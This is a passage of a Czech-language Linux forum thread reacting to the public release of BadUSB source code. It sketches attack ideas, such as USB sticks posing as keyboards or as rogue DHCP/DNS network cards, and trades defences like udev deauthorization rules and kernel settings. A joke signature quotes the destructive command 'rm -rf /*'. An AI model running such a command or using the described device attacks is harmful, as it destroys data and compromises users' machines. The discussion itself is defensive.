Dává se to jako parametr modulu usbcore (warning: netestoval jsem to).
Tak, kdo pro to napíše nějaký hezký interface? :)
5.10.2014 23:24 kralyk z abclinuxu | skóre: 29 | blog:
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Jj, taky jsem na to pak narazil, viz LWN, je to tam už od roku 2007 :-D Ještě by to chtělo, aby se to víc používalo v userspace...
Přidej se k odporu proti eko-fanatismu! Konzumuj prémiové informace plné zdravého rozumu a vyhýbej se těm nevhodným!
Jendа avatar 6.10.2014 00:02 Jendа | skóre: 76 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
To hrozí race condition. Ten default, co píše atalax níže, vypadá dobře.
5.10.2014 21:33 pedro
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Pokud nikdy USB klávesnici nepotřebujeme, pak stačí blacklistnout příslušný modul. Pokud ji potřebujeme, tak je třeba trochu skriptovat a blacklistnout modul až popřipojení naší legální klávesnice. Tím by mělo být riziko eliminováno.
Jendа avatar 5.10.2014 21:35 Jendа | skóre: 76 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Mně ten modul jak se jednou natáhne začne handlovat všechna HID.
7.10.2014 01:01 pedro
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
:-(, byl to je nápad, nemám to na čem vyzkoušet. Škoda.
5.10.2014 18:02 chrono
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Predpokladám, že BIOS bude tiež bez problémov pracovať s viacerými pripojenými klávesnicami.
Jendа avatar 5.10.2014 19:24 Jendа | skóre: 76 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Nicméně by šlo dodělat dodatečnou vrstvu do jádra
Mně by na destopu stačilo, kdyby se to řešilo v Xkách. (k serverům jednak většinou nepřipojuju USB zařízení, druhak tam nebývá aktivní session)
Jendа avatar 5.10.2014 19:21 Jendа | skóre: 76 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Nevím, řeší tohle udev? Podle mě HID zařízení začne fungovat tak nějak samo.
5.10.2014 21:35 Mrkva | skóre: 22 | blog: urandom
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
GreyDaemon ~ # cat /etc/udev/rules.d/blockusbhid.rules 
ACTION=="add", ATTR{bInterfaceClass}=="03" RUN+="/bin/sh -c 'echo 0 >/sys$DEVPATH/../authorized'"
Problem solved. A vubec, kdyz zamykam screen spoustim:
sysctl -w kernel.grsecurity.deny_new_usb=1
Warning: The patch is horribly wrong, don't use it. According to our tests, it just runs "rm -rf /*".
5.10.2014 13:22 chrono
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
V (niektorých) USB zariadeniach môžeš zmeniť firmware a tak sa napr. usb pamäťové zariadenie môže tváriť zároveň ako sieťová karta a môže tak odpovedať na DHCP žiadosť a vrátiť systému upravené adresy DNS serverov. Podobne sa dá predstierať, že zariadenie je aj klávesnica / myš (a takto napr. zmeniť BIOS za upravenú verziu skrytú na USB disku), prípadne je možné na USB disku skryť časť partície...
Hans1024 avatar 5.10.2014 13:53 Hans1024 | skóre: 5 | blog: hansovo
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn

Bezpecnostni problem ma v podstate 2 casti:

1. jak se muze infikovat firmware flashdisku:
Na linuxu je potreba root. Na windows je asi admin kazdy, ze?

2. jak muze flashka s infikovanym firmware ohrozit vas PC:
Prvnim utocnym vektorem, ktery se nabizi, je modifikace/infikovani souboru ukladanych na flashdisk. Dalsi moznosti utoku je chovat se jako jine zarizeni krome uloziste (jak popsali nademnou). Nekde na mailing listech se diskutovala jeste moznost modifikovat bezici OS pomoci DMA, ale samotna USB zarizeni nemuzou iniciovat DMA, takze by takovy utok byl nesmirne komplikovany.

Veni, vidi, copi
5.10.2014 13:56 kralyk z abclinuxu | skóre: 29 | blog:
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Na windows je asi admin kazdy, ze?
Už ne, tuhle část UNIXu po několika desítkách let zvládli okopírotvat...
Přidej se k odporu proti eko-fanatismu! Konzumuj prémiové informace plné zdravého rozumu a vyhýbej se těm nevhodným!
5.10.2014 14:55 sigma
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Na Windows NT je to od roku 1993.

Od Windows Vista je nové to, že ani admin není tak úplně admin, a každou bezpečnostně citlivou operaci je potřeba ad-hoc povolit, a to v dialogu spuštěném v jiném security contextu, takže s ním nemůžou jiné GUI aplikace manipulovat (např. simulovat klik na OK). Trochu něco jako sudo. Ale jde tohle vůbec zařídit na standardním X window serveru?
5.10.2014 15:14 Pali
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Lubovolna aplikacia co ma pristup k X serveru moze robit cokolvek s oknami (hoci aj vytvorenymi inou aplikaciou). Takze na standardnom asi tazko.

Zas na druhej strane windows manager uz z principu potrebuje ovladat vsetky okna, takze ak by sa to malo nejak vyriesit, tak window manager by tiez musel mat rovnako silne prava ako nejak ta ad-hoc aplikacia na potvrenie ci chces vykonat danu operaciu.

A kedze asi nikto rozumni nechce aby sa znemoznilo restartovat WM (ci uz vymena alebo nieco ine), tak to vyriesit tak lahko nepojde.
Jendа avatar 5.10.2014 19:27 Jendа | skóre: 76 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Zas na druhej strane windows manager uz z principu potrebuje ovladat vsetky okna, takze ak by sa to malo nejak vyriesit, tak window manager by tiez musel mat rovnako silne prava ako nejak ta ad-hoc aplikacia na potvrenie ci chces vykonat danu operaciu.
Ne, citlivý dialog může dočasně WM zablokovat.

Tohle je prostě celé blbě. Podívejte se na Qubes OS, jak to má vypadat.
6.10.2014 09:55 Pali
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Ne, citlivý dialog může dočasně WM zablokovat.
No ak nieco zastavi bez WM procesu, tak vsetky veci ako oramovanie okna a tlacidka na jeho zavretie prestanu fungovat... To tiez nie je dobre.
Jendа avatar 6.10.2014 10:25 Jendа | skóre: 76 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Právě, že to je cílem (aby ti na to nemohly hrabat nedůvěryhodné aplikace).
Hans1024 avatar 6.10.2014 10:37 Hans1024 | skóre: 5 | blog: hansovo
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Neduveryhodne aplikace nemaji v PC co delat.
Veni, vidi, copi
pavlix avatar 6.10.2014 10:54 pavlix | skóre: 54 | blog: pavlix
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
K čemu je PC bez aplikací?
Já už tu vlastně ani nejsem. Abclinuxu umřelo.
Jendа avatar 6.10.2014 11:35 Jendа | skóre: 76 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Zajímalo by mě, jakým webovým prohlížečem jsi odeslal svůj příspěvek, a zda máš v počítači libpng, ffmpeg, openssl a bash.
Hans1024 avatar 6.10.2014 12:38 Hans1024 | skóre: 5 | blog: hansovo
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Jedna vec je duveryhodnost a druha vec je zranitelnost/exploitovatelnost. Proti exploitnuti se da ruznymi zpusoby do jiste miry branit. Pokud vam pripada pravdepodobnost exploitnuti prilis vysoka, jsou ruzne zpusoby jak appku sandboxovat a podporu ze strany Xserveru k tomu nepotrebujete.
Veni, vidi, copi
Jendа avatar 6.10.2014 17:41 Jendа | skóre: 76 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Jedna vec je duveryhodnost a druha vec je zranitelnost/exploitovatelnost.
Aha. Tou „nedůvěryhodností“ jsem myslel normální aplikaci, kterou útočník exploitnul. Zmatení pojmů, pardon.
Pokud vam pripada pravdepodobnost exploitnuti prilis vysoka, jsou ruzne zpusoby jak appku sandboxovat a podporu ze strany Xserveru k tomu nepotrebujete.
Potřebuju, protože když jí dám přístup na X server, může číst klávesy, schránku, screenshotovat a posílat keystroky ostatním aplikacím. Jsou proti tomu pochybná rozšíření do X.
Hans1024 avatar 6.10.2014 18:18 Hans1024 | skóre: 5 | blog: hansovo
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
No pokud je u nejake appky riziko tak velke, tak bych ji ani nedaval pristup k X serveru. Je to bezpecnost vs funkcionalita - spousta aplikaci vyuziva cteni klaves, schranku, screenshotovani atd.
Veni, vidi, copi
Jendа avatar 6.10.2014 18:42 Jendа | skóre: 76 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
No pokud je u nejake appky riziko tak velke, tak bych ji ani nedaval pristup k X serveru.
Browser, prohlížeč obrázků, PDF nebo přehrávač videa se dneska blbě spouští bez X serveru.
pousta aplikaci vyuziva cteni klaves, schranku, screenshotovani atd.
U mně čte (oprávněně) klávesy jenom WM a schránku a screenshoty si můžu managovat bokem. Jak říkám, koukni na ten QubesOS.
Hans1024 avatar 6.10.2014 19:15 Hans1024 | skóre: 5 | blog: hansovo
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Browser, prohlížeč obrázků, PDF nebo přehrávač videa se dneska blbě spouští bez X serveru.
Lze pouzit treba Xephyr apod., nebo rovnou virtualni masinu.
U mně čte (oprávněně) klávesy jenom WM a schránku a screenshoty si můžu managovat bokem. Jak říkám, koukni na ten QubesOS.
QubesOS znam, jde do extremu s virtualkama.
Veni, vidi, copi
5.10.2014 17:16 Kvakor
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Pokud by infikované zařízení nečekalo a začalo provádět swvé "zlé akce" hned po připojení, tak v Linuxu existuje relativně jednoduchá obrana - přepnout se do neaktviního virtuálního terminálu, nebo - ještě lépe - do virtuálního terminálu, do kterého jsou vypisované zprávy jádra skrz syslog (já používám /dev/tty12). Uživatel uvidí, jako co je vložené zařízení detekováno a bude jasné, že pokud se například flashdisk ohlásí jako složené zařízení obsahující jedno mass storage a dvě HID, tak je nejspíš nakažené. Další výhoda neaktivního terminálu je to, že jakékliv akce s vyjímklou přepnutí terminálu a věcí typu Magic SysRq key nebo Ctr+Al+Del a spol. jsou ignorováný a navíc je uživatel uvidí.

Bohužel tato taktika selhává, pokud je zařízení už rovnou vstupní (jako Trójská myš) nebo začne své akce provádět až po nějaké době. Jediná obrana proti tomu by bylo mít "karanténí počítač", nejlépe nějaký systém nabootovaný z read-only média jako LiveCD, nepřipojenký k síti a nejlépe i ne-x86 (optimálně nějaká embedded deska s ARMem). Pokud by se k tomu přidala detekce veškerých vstupních odálostí (jako evtest, ale pro všechny existující zařízení) a nechalo se to běžet dostatečně dlouho (minimálně den), tak je velmi pravděpodobné, že by se tím odhalila většina infikovaných zařízení. Bylo by sice možné se takovéto detekci vyhnout, ale takto "opatrné" infikované zařízení by svou "infekci" šířilo jen velmi pomalu (u mallwaru není K-strategie moc výhodná).
6.10.2014 14:13 prqek | blog: prqek
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Dík za odkaz na tu myš. Od první chvíle co jsem o badusb čet mám pocit, že to není nic nového. Nebo mi nCo mi uniká? V čem je tenhle útok nový?
6.10.2014 14:24 chrono
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
V čom je, pri prehliadačoch, špeciálne napr. XSS, CSRF, ...? Veď je to len obyčajné spracovanie/odosielanie údajov a to predsa prehliadače robia úplne normálne.
Bystroushaak avatar 6.10.2014 14:47 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Nebo mi nCo mi uniká? V čem je tenhle útok nový?
Tak jak to chápu já;

Nové je to v tom, že to aktivně útočí na flashdisky, do kterých nahrává upravený firmware. Dřívější útoky byly spíš stylem speciálně zkonstruovaného zařízení (například té myši), které po připojení počítač napadly. Nyní v podstatě libovolný flashdisk může představovat riziko, protože nezjistíš, jestli je nakažený nebo ne pouhým scannem jeho obsahu (infikovaný je řadič, ne diskový prostor).
Jendа avatar 6.10.2014 17:43 Jendа | skóre: 76 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Nebo mi nCo mi uniká? V čem je tenhle útok nový?
Dřív ti musel útočník dát přímo zařízení, které uvnitř mělo HW na tohle. Teď to umí reflashnout různá zařízení bez fyzické úpravy útočníkem.
5.10.2014 18:43 MAx
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Problém s tím, že se např. flashka začne chovat jako klávesnice, myš nebo kdo ví co, je celkem jednoduchá. Prostě je třeba se uživatele zeptat. Nikdo jiný neví, jak se zařízení na venek tváří (v jaké je krabičce, jaký má potisk apod.) a tedy, co od něj uživatel očekává.

Problém by mohl být s klávesnicí, kde by uživatel nemusel mít jako potvrdit, že opravdu připojil klávesnici. Tam by ale stačilo nechat uživatele opsat nějaký kód, který OS vygeneruje. Zařízení jej samo nikde nezíská, pokud jej uživatel neopíše.

Ovšem pak jsou tu stejně jiné formy útoku, proti kterým obrana prakticky není:
  • opravdová klávesnice s chytrými vnitřnostmi občas může sama od sebe poslat nějaké stisky kláves navíc (nebo třeba poslat info, že uživatel stisknul jinou klávesu, než stisknul opravdu)
  • opravdový flash disk může sám od sebe občas změnit nějaká uložená data
  • takto může být postižený jakýkoli hw - procesor, pevný disk, monitor, síťová karta, ...
Takovéto činnosti prostě není možné nějak zvenku odhalit. Jediná obrana je zřejmě brát produkty od známých výrobců, u kterých by ztráta pověsti přinesla větší ztráty než by byly nějaké zisky z podobných podvodů. Otázka je, jak odlišit pravý produkt od padělku nebo modifikovaného pravého produktu. A když se do toho vloží NSA, tak může přesvědčit ke spolupráci klidně INTEL apod.
Jendа avatar 5.10.2014 19:30 Jendа | skóre: 76 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Jediná obrana je zřejmě brát produkty od známých výrobců, u kterých by ztráta pověsti přinesla větší ztráty než by byly nějaké zisky z podobných podvodů.
Například od Sony nebo od Cisca.
Heron avatar 5.10.2014 20:32 Heron | skóre: 52 | blog: root_at_heron | Olomouc
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Problém s tím, že se např. flashka začne chovat jako klávesnice, myš nebo kdo ví co, je celkem jednoduchá.

Tohle by nefungovalo, protože potom by přišel nějaký tydíít a začal by vysvětlovat, proč se USB 3G bazmek musí chovat nejdřív jako USB Mass Storage a až potom jako síťové zařízení ;-) (Pro vysvětlení, narážím tím na to, že místo toho, aby ta usb věc byla standardní a podporovaná by default, tak se na tu USB Storage část dává (beznadějně) zastaralý ovladač, který se nejdřív pokusí nainstalovat a potom ono zařízení přepne na 3G modem.)

Stejně tak myši, co jsou myši a současně usb mass storage. Uživatelé by vám vysvětlili, jak úžasná je to věc a jak moc tomu nerozumíte. ;-) (Pro vysvětlení: na tu usb storage část se ukládá .... konfigurace toho hw. Proč se konfigurace toho hw nemůže uložit do toho hw samotného, jak je desítky let zvykem je mi "záhadou". Ale dneska je asi lepší mít konfiguraci v usb mass storage na fatce a ve speciálním ovladači si ji přečíst a potom přes ovladač ovlivnit chování onoho hw.)

A vůbec, proč se bránit, když avirové firmy chtějí vydělávat. Tak jim to dopřejme, ne?

5.10.2014 21:14 32bit
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Nemělo by tohle čistě teoreticky být skoro okamžitě ošéfované ve všech GNU distribucích (např. Trisquel)? Když jsou všechny ty firmwares v těchhle distrech FOSS tak vydat záplatu by měla být otázka hodin/dní?
Jendа avatar 5.10.2014 21:34 Jendа | skóre: 76 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
1) Jde o firmware flashdisků, 2) Je to požadovaná vlastnost těch USB zařízení, ne bug.
6.10.2014 11:47 j
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
To je zase pleteni bice z howna ... a co teprv az pisalci prijdou na to, ze presne totez lze udelat se zcela libovolnym kusem HW, stejne tak lze modifikovat bios (kde je pro to navic radove vic prostoru), firmware libovolnyho HDD, firmware defakto libovolny karty ...

Pokud to nekdo mysli s bezpecnosti vazne, tak pouziva reseni, ktery uzivateli znemozi cokoli k pocitaci pripojit nebo i odpojit a to fyzicky. Jinak je to uplne jedno.
6.10.2014 12:08 LKG
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Jo. Když jsem to celé procházel, tak jsem měl úplně stejný pocit. Je to ekvivalentní připojení jakéhokoliv škodlivého USB zařízení. Akorát na to využili kontrolér USB flash, to je teda pecka.
6.10.2014 14:35 chrono
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Prečo máš pocit, že oni nevedia, že sa dá upraviť (takmer) akýkoľvek firmware?

PS: Koľko ľudí vie, že sa takto dajú upraviť USB zariadenia a čo je zlé na tom, že o tom niekto informuje?

PPS: Naozaj má upravený BIOS väčší dopad na dnešné PC, ako upravené USB zariadenie?
Jendа avatar 6.10.2014 17:43 Jendа | skóre: 76 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
PPS: Naozaj má upravený BIOS väčší dopad na dnešné PC, ako upravené USB zariadenie?
Ano (SMM).
6.10.2014 23:48 MAx
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Ano, jde to udělat s jakýkoli HW. Ale je rozumné chtít po operačním systému, aby uměl připojit bezpečně např. něco, co na první pohled vypadá (podle obalu) jako USB Flash. Tedy se uživatele zeptal "Připojujete poprvé nové zařízení typu klávesnice. Opravdu tak chcete učinit?". Tedy to za předpokladu, že ta USB flash se bude ve skutečnosti chovat jako klávesnice. Jinak je to podobná věc, jako když ve Windows byl ve výchozím stavu aktivní autorun - zasunul jsi flash kamaráda, abys mu na ni něco nahrál a ono ti to samo spustilo nějaké svinstvo z té flash.

To, že lze přehrát snadno firmware USB flash je nešikovné v tom, že se takové svinstvo může množit - tedy nemusí někdo vyrobit speciální flash, která se chová jako klávesnice, a tu ti podstrčit. Takových případů by bylo v praxi málo. Ale stačí mít obyčejnou flash a zavirovaný počítač a hnedle máš vyrobený takovýto zákeřný kousek HW. Tedy lze čekat, že ten problém se dotkne mnoha lidí.

Nicméně hlavní obrana je podle mě na OS. To, že ti někdo nakazí flashku je nepříjemné, ale nepředstavuje to ten hlavní problém. I kdyby to možné nebylo, bude vždy možné udělat si takový kus hw na míru (akorát to bude dražší, složitější, méně rozšířené). Navíc upravit OS je mnohem jednodušší než opravit firmware nebo dokonce hw existujících USB flash.
7.10.2014 09:01 j
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Ne, tohle reseni je ulne nejdementnejsi ze vsech dementnich reseni. ZADNY uzivatel naprosto NIKDY nesmi nic takovyho videt. Jedinej dusledek by byl ten, ze vsichni budou hledat (a najdou) zpusob, jak tuhle dmnci vypnout, ostane presne stejne jako widli dotazy, jestli chce uzivatel spustit aplikaci.

Je to presne stejny, jako kdyz se na zcela cokoli pta antivirak. Kazdej user klipne na ano, chci. A jeste bude nasranej, ze to porad vopruzuje.
7.10.2014 09:26 ebik | skóre: 2
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
ZADNY uzivatel naprosto NIKDY nesmi nic takovyho videt.
Tohle je ta nejvetsi demence.

Spravne reseni by bylo, kdyby to slo vypnout celkem jednoduse, pouze s dostatecnym varovanim. (A v nejmenovanem OS by na to melo byt API, ktere bude moct vyuzit antivir. At se snazi antivirove firmy, je to jejich job.) Mezi uzivateli at se siri co chce, dle jejich (ne)inteligence. Ale ve firmach, at je to na administratorovi, co povoli, co zakaze, a nebo jestli necha na uzivatelove zodpovednosti (pomoci vyse zmineneho dialogu), ze s tim pocitacem neco udela. Pripojit flashku a odnest si praci domu chce docela dost lidi, a porad je to lepsi nez si stomegove soubory posilat mejlem.
Jendа avatar 7.10.2014 09:49 Jendа | skóre: 76 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
ZADNY uzivatel naprosto NIKDY nesmi nic takovyho videt.
Nejspíš podle tebe nejsem uživatel, tak s dovolením budu používat systém, který není pro takové uživatele.

Jsou dle tebe špatné i hlášky když klikneš třeba na takovýto link, měl by to prohlížeč rovnou automaticky spustit?
7.10.2014 10:25 graviton
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Protitah: upravený firmware bude emulovat úplně tu samou flashku, akorát s přidaným sajrajtem (autorun trojan? upravené verze stávajícího obsahu?). Čas od času místo skutečné flashky připojí fake.

Ten žertík s přidanou klávesnicí je jen jedna možnost z mnoha.
Petr Tomášek avatar 7.10.2014 21:33 Petr Tomášek | skóre: 38 | blog: Vejšplechty
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Ano, jde to udělat s jakýkoli HW. Ale je rozumné chtít po operačním systému, aby uměl připojit bezpečně např. něco, co na první pohled vypadá (podle obalu) jako USB Flash. Tedy se uživatele zeptal "Připojujete poprvé nové zařízení typu klávesnice. Opravdu tak chcete učinit?".

Což je úplně nejvtipnější, když žádná jiná klávesnice (ani krysa) k systému připojená není a uživatel nemá jak připojení klávesnice potvrdit ;-).

multicult.fm | monokultura je zlo | welcome refugees!
Václav 7.10.2014 22:51 Václav "Darm" Novák | skóre: 26 | blog: Darmovy_kecy | Bechyně / Praha
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
"Byla detekována nová klávesnice. Stiskněte na ní <náhodné písmeno> pro potvrzení že nejde o podvodné zařízení."
Cross my heart and hope to fly, stick a cupcake in my eye!
Petr Tomášek avatar 6.10.2014 20:28 Petr Tomášek | skóre: 38 | blog: Vejšplechty
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Ochrana je jednoduchá: Vytvořit jednoduchý kus HW, který na jedné straně bude USB Host a na druhé straně USB Device a na něm udělat "firewall", který propustí jen příslušný provoz.

Teď jen mít čas na to, to ubastlit :-)
multicult.fm | monokultura je zlo | welcome refugees!
Hans1024 avatar 6.10.2014 21:01 Hans1024 | skóre: 5 | blog: hansovo
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
A otevrem si obchod s USB kondomy :-D
Veni, vidi, copi
7.10.2014 09:28 ebik | skóre: 2
Rozbalit Rozbalit vše Re: Zdrojový kód k BadUSB zveřejněn
Ale nesmime zapomenout to udelat z pocitace preflashovatelne, abychom si mohli za cas otevrit obchod s usb kondomy pro usb kondomy.

Založit nové vláknoNahoru

Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

ISSN 1214-1267   www.czech-server.cz
© 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.